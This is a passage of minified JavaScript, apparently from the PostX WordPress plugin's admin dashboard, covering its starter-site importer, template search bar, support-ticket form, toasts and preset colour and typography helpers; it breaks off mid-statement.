a=n(7294),r=n(448),o=n(4766),i=n(4482),l=n(8949),s=n(4371),p=n(5066);n(4602);const{__}=wp.i18n,c=e=>{const{_val:t,setLiveUrl:n,liveUrl:c}=e,[d,u]=(0,a.useState)({}),[m,f]=(0,a.useState)({}),[h,g]=(0,a.useState)({}),v={deletePrevious:"yes",installPlugin:"yes",user_email:ultp_dashboard_pannel.user_email,get_newsletter:"yes",importDummy:"yes"},[_,w]=(0,a.useState)(!1),[b,x]=(0,a.useState)(!1),[y,k]=(0,a.useState)(!1),[E,C]=(0,a.useState)([]),[S,M]=(0,a.useState)(v),[L,N]=(0,a.useState)(0),[Z,P]=(0,a.useState)({type:"desktop",width:"100%"}),[z,A]=(0,a.useState)(!1),[B,H]=(0,a.useState)(!0),[T,R]=(0,a.useState)(!1),[O,j]=(0,a.useState)({plugin:!1,content:!1}),[V,F]=(0,a.useState)(!1),[W,D]=(0,a.useState)({}),[I,U]=(0,a.useState)({}),[$,G]=(0,a.useState)([]);(0,a.useEffect)((()=>{window.fetch("https://postxkit.wpxpo.com/"+t.live+"/wp-json/importer/global_settings",{method:"GET"}).then((e=>e.text())).then((e=>{const t=(0,r.cC)(e,{});t.success&&(((e={})=>{wp.apiFetch({path:"/ultp/v1/action_option",method:"POST",data:{type:"get"}}).then((t=>{if(t.success){let n={...t.data,...e};n={...n,globalCSS:(0,r.AJ)("globalCSS",n)},g(n)}}))})(t.postx_global),D(t.ultpPresetColors),U(t.ultpPresetTypos),G(t.plugins))})).catch((e=>{}))}),[]);const q=(e,t,n,r="")=>(0,a.createElement)("div",{className:"input_container"},"checkbox"==t&&(0,a.createElement)("input",{id:e,className:r,name:e,type:t,defaultChecked:!(!S[e]||"yes"!=S[e]),onChange:t=>{const n=t.target.checked?"yes":"no";M({...S,[e]:n})}}),"checkbox"!=t&&(0,a.createElement)("input",{id:e,className:r,name:e,type:t,defaultValue:S[e]||"",onChange:t=>{const n=t.target.value;M({...S,[e]:n})}}),n&&(0,a.createElement)("span",null,(0,a.createElement)("span",{className:"ultp-info"},n)));return(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:" ultp_starter_packs_demo theme-install-overlay wp-full-overlay expanded "+(B?"active":"inactive"),style:{display:"block"}},(0,a.createElement)("div",{className:"wp-full-overlay-sidebar "},(0,a.createElement)("div",{className:"wp-full-overlay-header"},(0,a.createElement)("div",{className:"ultp_starter_packs_demo_header"},(0,a.createElement)("div",{className:"packs_title"},t.title,(0,a.createElement)("span",null,t.category)),(0,a.createElement)("button",{onClick:()=>n(""),className:"close-full-overlay"})),(0,a.createElement)("div",{className:"ultp-starter-collapse "+(B?"active":"inactive"),onClick:()=>{H(!B)}},o.ZP.collapse_bottom_line)),Array(6).fill(1).map(((e,t)=>(0,a.createElement)("div",{key:t,className:"ultp-addon-item ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-addon-item-contents"},(0,a.createElement)("div",{className:"ultp-addon-item-name"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:50,unit1:"px",size2:50,unit2:"px",br:18}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:190,unit1:"px",size2:28,unit2:"px",br:4}})),(0,a.createElement)("div",{className:"ultp-description"},(0,a.createElement)(l.Z,{type:"custom_size",classes:"loop",c_s:{size1:100,unit1:"%",size2:14,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",classes:"loop",c_s:{size1:70,unit1:"%",size2:14,unit2:"px",br:2}}))),(0,a.createElement)("div",{className:"ultp-addon-item-actions ultp-dash-control-options"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:40,unit1:"px",size2:20,unit2:"px",br:8}}),(0,a.createElement)("div",{className:"ultp-docs-action"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:50,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:22,unit2:"px",br:2}})))))),(0,a.createElement)("div",{className:"wp-full-overlay-sidebar-content"},W.hasOwnProperty("Base_1_color")?(0,a.createElement)(a.Fragment,null,(0,a.createElement)(s.Z,{ultpPresetColors:W,currentPresetColors:d,setCurrentPresetColors:u,currentPostxGlobal:h,setCurrentPostxGlobal:g})):(0,a.createElement)("div",{className:"skeletonOverflow"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:140,unit1:"px",size2:40,unit2:"px",br:40}}),(0,a.createElement)("div",{className:"skeletonOverflow_colors"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:140,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)("div",{className:"demos-color"},Array(10).fill(1).map(((e,t)=>(0,a.createElement)(l.Z,{key:t,type:"custom_size",c_s:{size1:100,unit1:"px",size2:30,unit2:"px",br:6}})))))),I.hasOwnProperty("Body_and_Others_typo")?(0,a.createElement)(a.Fragment,null,(0,a.createElement)(p.Z,{ultpPresetTypos:I,currentPresetTypos:m,setCurrentPresetTypos:f})):(0,a.createElement)("div",{className:"skeletonOverflow"},(0,a.createElement)("div",{className:"skeletonOverflow_colors"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:140,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)("div",{className:"demos-color"},Array(10).fill(1).map(((e,t)=>(0,a.createElement)(l.Z,{key:t,type:"custom_size",c_s:{size1:100,unit1:"px",size2:30,unit2:"px",br:6}}))))))),(0,a.createElement)("div",{className:"wp-full-overlay-footer"},(0,a.createElement)("div",{className:"ultp_starter_import_options"},(0,a.createElement)("div",{className:"option_buttons"},t.pro&&!ultp_dashboard_pannel.active?(0,i.hx)(`https://www.wpxpo.com/postx/?utm_source=db-postx-starter&utm_medium=${t.live}-upgrade-pro&utm_campaign=postx-dashboard#pricing`,""):(0,a.createElement)("a",{className:"ultp-starter-button",onClick:()=>{w(!0)}},__("Import Site","ultimate-post"))),(0,a.createElement)("div",{className:"ultp-starter-packs-device-container"},(0,a.createElement)("span",{onClick:()=>P({type:"desktop",width:"100%"}),className:"ultp-starter-packs-device "+("desktop"==Z.type?"d-active":"")},o.ZP.desktop),(0,a.createElement)("span",{onClick:()=>P({type:"tablet",width:(h.breakpointSm||"990")+"px"}),className:"ultp-starter-packs-device "+("tablet"==Z.type?"d-active":"")},o.ZP.tablet),(0,a.createElement)("span",{onClick:()=>P({type:"mobile",width:(h.breakpointXs||"767")+"px"}),className:"ultp-starter-packs-device "+("mobile"==Z.type?"d-active":"")},o.ZP.mobile))))),(0,a.createElement)("div",{className:"wp-full-overlay-main"},!T&&(0,a.createElement)("div",{className:"iframe_loader"},(0,a.createElement)("div",{className:"iframe_container"},(0,a.createElement)("div",{className:"iframe_header"},(0,a.createElement)("div",{className:"iframe_header_top"},(0,a.createElement)("div",{className:"header_top_left"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:60,unit2:"px",br:60}})),(0,a.createElement)("div",{className:"header_top_right"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:90,unit1:"px",size2:30,unit2:"px",br:4}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:90,unit1:"px",size2:30,unit2:"px",br:4}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:90,unit1:"px",size2:30,unit2:"px",br:4}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:90,unit1:"px",size2:30,unit2:"px",br:4}}),Array(3).fill(1).map(((e,t)=>(0,a.createElement)(l.Z,{key:t,type:"custom_size",c_s:{size1:30,unit1:"px",size2:30,unit2:"px",br:30}})))))),(0,a.createElement)("div",{className:"iframe_body_content"},(0,a.createElement)("div",{className:"iframe_body_slider"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:300,unit2:"px",br:2}})),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:190,unit1:"px",size2:36,unit2:"px",br:2}}),(0,a.createElement)("div",{className:"iframe_body"},(0,a.createElement)("div",{className:"iframe_body_left"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:300,unit2:"px",br:2}})),(0,a.createElement)("div",{className:"iframe_body_right"},(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:140,unit2:"px",br:2}}),(0,a.createElement)(l.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:140,unit2:"px",br:2}})))))),(0,a.createElement)("iframe",{className:`${Z.type}View`,onLoad:()=>{R(!0),(()=>{const e=document.querySelector("#ultp-starter-preview");if(d.hasOwnProperty("Base_1_color")){const t=(0,r.AJ)("styleCss",d);if(e.contentWindow){const n={type:"replaceColorRoot",id:"#ultp-preset-colors-style-inline-css",styleCss:t,dlMode:h.enableDark?"ultpDark":"ultpLight"};e.contentWindow.postMessage(n,"*")}}if(m.hasOwnProperty("Body_and_Others_typo")){const t=(0,r.AJ)("typoCSS",m,!0);if(e.contentWindow){const n={type:"replaceColorRoot",id:"#ultp-preset-typo-style-inline-css",styleCss:t};e.contentWindow.postMessage(n,"*")}}})()},style:{display:"block",margin:"0 auto",maxWidth:Z.width},id:"ultp-starter-preview",src:"https://postxkit.wpxpo.com/"+c}))),_&&(0,a.createElement)("div",{className:"ultp-stater-container-settings-overlay"},(0,a.createElement)("div",{className:"ultp-stater-settings-container"},(0,a.createElement)("div",null,(0,a.createElement)("div",{className:"ultp-popup-stater"},b?(0,a.createElement)(a.Fragment,null,y?(0,a.createElement)("div",{className:"ultp_processing_import"},(0,a.createElement)("div",{className:"stater_title"},__(`Started building ${t.title} website`,"ultimate-post")),(0,a.createElement)("div",null,(0,a.createElement)("div",{className:"ultp_import_builders ultp-info"},__("The import process can take a few seconds depending on the size of the kit you are importing and speed of the connection.","ultimate-post")," ",(0,a.createElement)("br",null),(O.plugin||O.content)&&(0,a.createElement)("div",{className:"progress"},(0,a.createElement)("div",null,(0,a.createElement)("strong",null,"Progress:")," ",O.plugin?"Plugin Installation is":O.content?"Page/Posts/Media Importing is":"Site Importing"," ","on progress..")))),(0,a.createElement)("div",{className:"ultp_processing_show"},(0,a.createElement)("div",{className:"ultp-importer-loader"},(0,a.createElement)("div",{id:"ultp-importer-loader-bar",style:{width:L+"%"}}),(0,a.createElement)("div",{id:"ultp-importer-loader-percentage",style:{color:L>52?"#fff":"#000"}},L+"%"))),(0,a.createElement)("div",{className:"ultp_import_notice"},(0,a.createElement)("span",null,__("Note:","ultimate-post")),__("Please do not close this browser window until import is completed.","ultimate-post"))):(0,a.createElement)("div",{className:"ultp_successful_import"},(0,a.createElement)("div",{className:"stater_title"},t.title,__(` Imported ${V?"Failed":"Successfully"} `,"ultimate-post")),(0,a.createElement)("div",null,V?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp_import_builders"},__("Due to resquest timeout this import is failed","ultimate-post"),(0,a.createElement)("a",{className:"cursor",onClick:()=>{window.location.reload()}},__("Refresh","ultimate-post")),__("page and try again","ultimate-post"))):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp_import_builders"},__("Navigate to","ultimate-post"),(0,a.createElement)("a",{className:"cursor",onClick:()=>{window.location.href=ultp_dashboard_pannel.builder_url,window.location.reload()}},__("Site Builder to edit","ultimate-post")),__("your Archive, Post, Default Page and other templates.","ultimate-post")),(0,a.createElement)("a",{className:"ultp-primary-button",href:ultp_dashboard_pannel.home_url},__("View Your Website","ultimate-post")))))):(0,a.createElement)("div",null,(0,a.createElement)("div",{className:"ultp-info ultp-info-desc"}," ",__("Import the entire site including posts, images, pages, content and plugins.","ultimate-post")),(0,a.createElement)("div",null,(0,a.createElement)("div",{className:"stater_title"},__("Import Settings","ultimate-post")),q("importDummy","checkbox",__("Import dummy post, taxonomy and featured images","ultimate-post")),q("deletePrevious","checkbox",__("Delete Previously imported sites","ultimate-post")),q("installPlugin","checkbox",__("Install required plugins","ultimate-post"))),(0,a.createElement)("div",{className:"starter_page_impports"},(0,a.createElement)("div",{className:"stater_title"},__("Template/Pages","ultimate-post")),t?.templates?.map(((e,t)=>(!z&&t<3||z)&&(0,a.createElement)("div",{key:t,className:"input_container"},(0,a.createElement)("input",{type:"checkbox",defaultChecked:!E.includes(e.name),onChange:t=>{t.target.checked&&E.includes(e.name)?C(E.filter((t=>t!==e.name))):t.target.checked||E.includes(e.name)||C([...E,e.name])}}),(0,a.createElement)("span",null,(0,a.createElement)("span",{className:"ultp-info"},e.name))))),t.templates.length>3&&(0,a.createElement)("div",{className:"cursor",onClick:()=>{A(!z)}},"Show "+(z?"less":"more")," ",o.ZP.videoplay)),(0,a.createElement)("div",null,(0,a.createElement)("div",{className:"stater_title"},__("Subscribe","ultimate-post")),(0,a.createElement)("span",null,__("Stay up to date with the latest started templates and special offers","ultimate-post")),q("user_email","email","","email_box"),q("get_newsletter","checkbox",__("Stay updated with exciting features and news."),"get_newsletter")))),!b&&(0,a.createElement)("div",{className:"starter_import "},(0,a.createElement)("a",{className:"ultp-primary-button",onClick:()=>(async e=>{x(!0);let n,a=0;async function o(e,t,r){n=setInterval((()=>{e>=t?clearInterval(n):(e++,a++,N(e))}),r)}if(o(a,70,"yes"==S.importDummy?800:400),e){x(!0),k(!0);const i=$;if((0,r.x2)("set","ultpPresetColors",d),(0,r.x2)("set","ultpPresetTypos",m),wp.apiFetch({method:"POST",path:"/ultp/v1/action_option",data:{type:"set",data:h}}),"yes"==S.deletePrevious||"yes"==S.get_newsletter){const e=new Promise(((e,t)=>{wp.apiFetch({path:"/ultp/v3/deletepost_getnewsletters",method:"POST",data:{deletePrevious:S.deletePrevious,get_newsletter:S.get_newsletter}}).then((t=>{e("responsed")}))}));await e}if("yes"==S.importDummy){const t=new Promise(((t,n)=>{wp.apiFetch({path:"/ultp/v3/starter_dummy_post",method:"POST",data:{api_endpoint:e,importDummy:S.importDummy}}).then((e=>{t("responsed")})).catch((e=>{console.log(e),t("responsed")}))}));await t}if("yes"==S?.installPlugin){j({...O,plugin:!0});const e=i.map(((e,t)=>new Promise(((t,n)=>{jQuery.ajax({type:"POST",url:ultp_dashboard_pannel.ajax,data:{action:"install_required_plugin",wpnonce:ultp_dashboard_pannel.security,plugin:JSON.stringify(e)}}).done((function(e){t("responsed")}))}))));await Promise.all(e),j({...O,plugin:!1})}clearInterval(n),o(a+1,80,500);const l=t.templates?.filter((e=>!E.includes(e.name)));l.length>0&&(j({...O,content:!0}),wp.apiFetch({path:"/ultp/v3/starter_import_content",method:"POST",data:{excludepages:JSON.stringify(E),api_endpoint:e,importDummy:S.importDummy,installPlugin:S?.installPlugin}}).then((e=>{clearInterval(n),o(a+1,100,50),setTimeout((()=>{k(!1),j({...O,content:!1})}),50*(100-a+2)),e.success||F(!0)})).catch((e=>{console.log(e),o(a+1,100,50),setTimeout((()=>{k(!1),j({...O,content:!1})}),50*(100-a+2))})))}})("https://postxkit.wpxpo.com/"+t.live)},__("Start Importing","ultimate-post"))),(0,a.createElement)("button",{onClick:()=>{y||(M(v),x(!1),N(0),k(!1),w(!1))},className:"ultp-popup-close "+(y?"s_loading":"")},o.ZP.close_line)))))}},6488:(e,t,n)=>{"use strict";n.d(t,{Z:()=>s});var a=n(7294),r=n(4766),o=n(2402),i=n(7763),l=n(5324);const{__}=wp.i18n,s=e=>{const{changeStates:t,column:n,showWishList:s,_fetchFile:p,fetching:c,searchQuery:d,fields:u,fieldValue:m,fieldOptions:f,useState:h,useEffect:g,useRef:v}=e;return(0,a.createElement)("div",{className:"ultp-templatekit-layout-search-container"},(0,a.createElement)("div",{className:"ultp-templatekit-search-container"},u?.filter&&(0,a.createElement)(a.Fragment,null," ",(0,a.createElement)("span",null,__("Filter:","ultimate-post")),(0,a.createElement)(l.Z,{useState:h,useEffect:g,useRef:v,value:m?.filter,contentWH:{height:"190px",width:"150px"},onChange:e=>{t("filter",e)},options:f?.filterArr||[]})),u?.trend&&m?.trend&&(0,a.createElement)(l.Z,{useState:h,useEffect:g,useRef:v,value:m?.trend,onChange:e=>{t("trend",e)},options:[{value:"all",label:__("Popular / Latest","ultimate-post")},{value:"popular",label:__("Popular","ultimate-post")},{value:"latest",label:__("Latest","ultimate-post")}]}),u?.freePro&&(0,a.createElement)(l.Z,{useState:h,useEffect:g,useRef:v,value:m?.freePro,onChange:e=>{t("freePro",e)},options:[{value:"all",label:__("Free / Pro","ultimate-post")},{value:"free",label:__("Free","ultimate-post")},{value:"pro",label:__("Pro","ultimate-post")}]})),(0,a.createElement)("div",{className:"ultp-templatekit-layout-container"},(0,a.createElement)(o.Z,{changeStates:t,searchQuery:d}),(0,a.createElement)("span",{className:"ultp-templatekit-iconcol2 "+("2"==n?"ultp-lay-active":""),onClick:()=>t("column","2")},i.Z.grid_col1),(0,a.createElement)("span",{className:"ultp-templatekit-iconcol3 "+("3"==n?"ultp-lay-active":""),onClick:()=>t("column","3")},i.Z.grid_col2),(0,a.createElement)("div",{className:"ultp-premade-wishlist-con"},(0,a.createElement)("span",{className:"ultp-premade-wishlist cursor "+(s?"ultp-wishlist-active":""),onClick:()=>{t("wishlist",!s)}},r.ZP[s?"love_solid":"love_line"])),p&&(0,a.createElement)("div",{onClick:()=>p(),className:"ultp-filter-sync"},(0,a.createElement)("span",{className:"dashicons dashicons-update-alt "+(c?" rotate":"")}),__("Synchronize","ultimate-post"))))}},58:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294);n(3358);const{__}=wp.i18n,r=()=>(0,a.createElement)("input",{type:"file",name:"attachment",accept:"image/png, image/jpeg",className:"xpo-input-support",id:"xpo-support-file-input"}),o=()=>{const[e,t]=(0,a.useState)(!1),[n,o]=(0,a.useState)(!1),[i,l]=(0,a.useState)(!1),s=(0,a.useRef)(null),p=(0,a.useRef)(null);return(0,a.useEffect)((()=>{!e&&i&&l(!1)}),[e,i]),(0,a.useEffect)((()=>{const n=new AbortController;if(e)return document.addEventListener("mousedown",(e=>{s.current&&!s.current.contains(e.target)&&(t(!1),l(!1))}),{signal:n.signal}),()=>{n.abort()}}),[e]),(0,a.createElement)("div",{ref:s},(0,a.createElement)("span",{className:"xpo-support-pops-btn xpo-support-pops-btn--small "+(e?"xpo-support-pops-btn--big":""),onClick:()=>t((e=>!e)),role:"button",tabIndex:-1,onKeyDown:e=>{"Enter"===e.key&&t((e=>!e))}},(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"28",height:"28",fill:"none",viewBox:"0 0 28 28"},(0,a.createElement)("path",{fill:"var(--xpo-support-color-reverse)",fillRule:"evenodd",d:"M27.3 14c0 7.4-6 13.3-13.3 13.3H.7l3.9-3.9A13.3 13.3 0 0 1 14 .7c7.4 0 13.3 6 13.3 13.3Zm-19 1.7a1.7 1.7 0 1 0 0-3.4 1.7 1.7 0 0 0 0 3.4Zm7.4-1.7a1.7 1.7 0 1 1-3.4 0 1.7 1.7 0 0 1 3.4 0Zm5.6 0a1.7 1.7 0 1 1-3.3 0 1.7 1.7 0 0 1 3.3 0Z",clipRule:"evenodd"}))),e&&(0,a.createElement)("div",{className:`xpo-support-pops-container ${e?"xpo-support-entry-anim":""} ${i?"":"xpo-support-pops-container--full-height"}`},(0,a.createElement)("div",{className:"xpo-support-pops-header"},(0,a.createElement)("div",{style:{maxHeight:i?"0px":"140px",opacity:i?"0":"1",transition:"max-height 0.3s, opacity 0.3s"}},(0,a.createElement)("div",{className:"xpo-support-header-bg"}),(0,a.createElement)("div",{className:"xpo-support-pops-avatars"},(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/support/1.png",alt:"WPXPO"}),(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/support/2.jpg",alt:"A. Owadud Bhuiyan"}),(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/support/3.jpg",alt:"Abdullah Al Mahmud"}),(0,a.createElement)("div",{className:"xpo-support-signal-green xpo-support-signal"})),(0,a.createElement)("div",{className:"xpo-support-pops-text"},"Questions? Create an Issue!"))),(0,a.createElement)("div",{className:"xpo-support-chat-body"},(0,a.createElement)("div",{style:{maxHeight:i?"174px":"0px",opacity:i?"1":"0",transition:"max-height 0.3s, opacity 0.3s"}},i&&(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"xpo-support-thankyou-icon"},(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 52 52",className:"xpo-support-animation"},(0,a.createElement)("circle",{className:"xpo-support-circle",cx:"26",cy:"26",r:"25",fill:"none"}),(0,a.createElement)("path",{className:"xpo-support-check",fill:"none",d:"M14.1 27.2l7.1 7.2 16.7-16.8"}))),(0,a.createElement)("div",{className:"xpo-support-thankyou-title"},__("Thank You!","ultimate-post")),(0,a.createElement)("div",{className:"xpo-support-thankyou-subtitle"},__("Your message has been received. We will contact you soon on your email with a response. Stay connected and check mail!","ultimate-post")))),(0,a.createElement)("form",{ref:p,onSubmit:e=>{if(n)return;e.preventDefault(),o(!0);const t=new FormData(e.target);fetch("https://wpxpo.com/wp-json/v2/support_mail",{method:"POST",body:t}).then((e=>{if(!e.ok)throw new Error("Failed to submit ticket");l(!0),p.current&&p.current.reset()})).catch((e=>{console.log(e)})).finally((()=>{o(!1)}))},encType:"multipart/form-data",style:{maxHeight:i?"0px":"376px",opacity:i?"0":"1",transition:"max-height 0.3s, opacity 0.3s"}},(0,a.createElement)("input",{type:"hidden",name:"user_name",defaultValue:ultp_dashboard_pannel.userInfo.name}),(0,a.createElement)("input",{type:"email",name:"user_email",className:"xpo-input-support",defaultValue:ultp_dashboard_pannel.userInfo.email,required:!0}),(0,a.createElement)("input",{type:"hidden",name:"subject",value:"Support from PostX"}),(0,a.createElement)("div",{className:"xpo-support-title"},__("Message","ultimate-post")),(0,a.createElement)("textarea",{name:"desc",className:"xpo-input-support",placeholder:"Write your message here..."}),(0,a.createElement)(r,null),(0,a.createElement)("button",{type:"submit",className:"xpo-send-button",disabled:n},n?(0,a.createElement)(a.Fragment,null,"Sending",(0,a.createElement)("div",{className:"xpo-support-loading"})):(0,a.createElement)(a.Fragment,null,"Send",(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"21",height:"20",fill:"none",viewBox:"0 0 21 20"},(0,a.createElement)("path",{fill:"var(--xpo-support-color-reverse)",d:"M18.4 10c0-.6-.3-1.1-.8-1.4L5 2c-.6-.3-1.2-.3-1.7 0-.6.4-.9 1.3-.7 1.9l1.2 4.8c0 .5.5.8 1 .8h7c.3 0 .6.3.6.6 0 .4-.3.6-.6.6h-7c-.5 0-1 .4-1 .9l-1.3 4.8c-.1.6 0 1.1.5 1.5l.1.2c.5.4 1.2.4 1.8.1l12.5-6.6c.6-.3 1-.9 1-1.5Z"}))))))))}},1389:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);n(6509);const r=e=>{const{title:t,modalContent:n,setModalContent:r}=e;return(0,a.createElement)("div",{className:"ultp-dashboard-modal-wrapper",onClick:e=>{e.target?.closest(".ultp-dashboard-modal")||r("")}},(0,a.createElement)("div",{className:"ultp-dashboard-modal"},(0,a.createElement)("div",{className:"ultp-modal-header"},t&&(0,a.createElement)("span",{className:"ultp-modal-title"},t),(0,a.createElement)("a",{className:"ultp-popup-close",onClick:()=>r("")})),(0,a.createElement)("div",{className:"ultp-modal-body"},n)))}},8949:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);n(619);const r=e=>{const{type:t,size:n,loop:r,unit:o,c_s:i,classes:l}=e,s=()=>{let e={};switch(t){case"image":case"circle":e={width:n?n+"px":"300px",height:n?n+"px":"300px"};break;case"title":e={width:`${n||"100"}${o||"%"}`};break;case"button":e={width:n?n+"px":"90px"};break;case"custom_size":e={width:`${i.size1?i.size1:"100"}${i.unit1?i.unit1:"%"}`,height:`${i.size2?i.size2:"20"}${i.unit2?i.unit2:"px"}`,borderRadius:i.br?i.br+"px":"0px"}}return e};return(0,a.createElement)(a.Fragment,null,r?(0,a.createElement)(a.Fragment,null,Array(parseInt(r)).fill("1").map(((e,n)=>(0,a.createElement)("div",{key:n,className:`ultp_skeleton__${t} ultp_frequency loop ${l||""}`,style:s()})))):(0,a.createElement)("div",{className:`ultp_skeleton__${t} ultp_frequency ${l||""}`,style:s()}))}},356:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(7294);n(2413);const{__}=wp.i18n,r=({delay:e,toastMessages:t,setToastMessages:n})=>{const[r,o]=(0,a.useState)(!0),[i,l]=(0,a.useState)("show");return(0,a.useEffect)((()=>{const t=setTimeout((()=>{o(!1),l(""),n({state:!1,status:""})}),e);return()=>clearTimeout(t)}),[e]),(0,a.createElement)("div",{className:"toast"},r&&t.status&&t.messages.length>0&&(0,a.createElement)("div",{className:"toastMessages"},t.messages.map(((e,r)=>(0,a.createElement)("span",{key:`toast_${Date.now().toString()}_${r}`},(0,a.createElement)("div",{className:`toaster ${i}`},(0,a.createElement)("span",null,"error"==t.status?(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 52 52",className:"animation",stroke:"currentColor"},(0,a.createElement)("circle",{cx:"26",cy:"26",r:"25",fill:"none",className:"circle cross"}),(0,a.createElement)("path",{fill:"none",d:"M 12,12 L 40,40 M 40,12 L 12,40",className:"check"})):(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 52 52",className:"animation",stroke:"currentColor"},(0,a.createElement)("circle",{className:"circle",cx:"26",cy:"26",r:"25",fill:"none"}),(0,a.createElement)("path",{className:"check",fill:"none",d:"M14.1 27.2l7.1 7.2 16.7-16.8"}))),(0,a.createElement)("span",{className:"itmCenter"},e),(0,a.createElement)("span",{className:"itmLast",onClick:()=>(e=>{let a=[...t.messages];a=a.filter(((t,n)=>n!==e)),n({...t,messages:a})})(r)},__("Close","ultimate-post"))))))))}},448:(e,t,n)=>{"use strict";n.d(t,{AJ:()=>o,cC:()=>l,x2:()=>r});var a=n(2030);const{__}=wp.i18n,r=(e,t,n,a)=>{wp.apiFetch({path:"/ultp/v1/postx_presets",method:"POST",data:{type:e,key:t,data:n}}).then((r=>{r.success&&("set"==e&&i(t,n),a&&a(r))}))},o=(e,t="",n=!1)=>{if("typoStacks"==e)return[[{type:"sans-serif",weight:500,family:"Roboto"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"serif",weight:600,family:"Roboto Slab"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"sans-serif",weight:600,family:"Jost"},{type:"sans-serif",weight:400,family:"Jost"}],[{type:"display",weight:500,family:"Roboto"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"serif",weight:700,family:"Arvo"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"sans-serif",weight:500,family:"Roboto"},{type:"sans-serif",weight:400,family:"Roboto"}],[{type:"sans-serif",weight:700,family:"Merriweather"},{type:"sans-serif",weight:400,family:"Merriweather"}],[{type:"sans-serifs",weight:500,family:"Oswald"},{type:"sans-serif",weight:400,family:"Source Sans Pro"}],[{type:"display",weight:400,family:"Abril Fatface"},{type:"sans-serif",weight:400,family:"Poppins"}],[{type:"serif",weight:700,family:"Cardo"},{type:"sans-serif",weight:400,family:"Inter"}]];if("multipleTypos"==e)return{Body_and_Others_typo:["body_typo","paragraph_1_typo","paragraph_2_typo","paragraph_3_typo"],Heading_typo:["heading_h1_typo","heading_h2_typo","heading_h3_typo","heading_h4_typo","heading_h5_typo","heading_h6_typo"]};if("presetTypoKeys"==e)return["Heading_typo","Body_and_Others_typo"];if("colorStacks"==e)return[["#f4f4ff","#dddff8","#B4B4D6","#3323f0","#4a5fff","#1B1B47","#545472","#262657","#10102e"],["#ffffff","#f7f4ed","#D6D1B4","#fab42a","#f4cd4e","#3B3118","#6F6C53","#483d1f","#29230f"],["#ffffff","#eaf7ea","#C2DBBF","#3b9138","#54a757","#1E381A","#586E56","#23411f","#162c11"],["#fdf7ff","#eadef5","#C1B4D6","#8749d0","#995ede","#301B42","#635472","#38204e","#231133"],["#fffcfc","#fce5ec","#D6B4BC","#f01f50","#ff5878","#431B23","#72545B","#4d2029","#36141b"],["#ffffff","#ecf3f8","#B4C2D6","#2890e8","#6cb0f4","#1D3347","#4B586C","#2c4358","#10202b"],["#f8f3ed","#f2e2d0","#D6C4B4","#dd8336","#f09f4d","#3D2A1D","#6E5F52","#483324","#2e1e11"],["#ffffff","#faf0f4","#D6B4CF","#d948a2","#e56ab5","#401B2E","#725468","#4e2239","#290e1d"],["#f2f7ea","#e1e6c4","#D2DBBF","#829d46","#a1c36b","#30371A","#5F6551","#38401f","#242e10"],["#ffffff","#e9f7f3","#B5D1C7","#3cbe8b","#59d5a5","#1C3D3F","#46675E","#20484b","#153234"]];if("presetColorKeys"==e)return["Base_1_color","Base_2_color","Base_3_color","Primary_color","Secondary_color","Tertiary_color","Contrast_3_color","Contrast_2_color","Contrast_1_color"];if("presetGradientKeys"==e)return["Cold_Evening_gradient","Purple_Division_gradient","Over_Sun_gradient","Morning_Salad_gradient","Fabled_Sunset_gradient"];if("styleCss"==e){let e=":root { ";return Object.keys(t).forEach(((a,r)=>{if(!["rootCSS","globalColorCSS"].includes(a)){const r=a,o=t[a]?.hasOwnProperty("openColor")?"color"==t[a].type?t[a].color:t[a].gradient:t[a]||n||"";e+=`--postx_preset_${r}: ${o}; `}})),e+=" }",e}if("typoCSS"==e){const e=o("multipleTypos");let r="",i=":root { ";const l=["Arial","Tahoma","Verdana","Helvetica","Times New Roman","Trebuchet MS","Georgia"];return 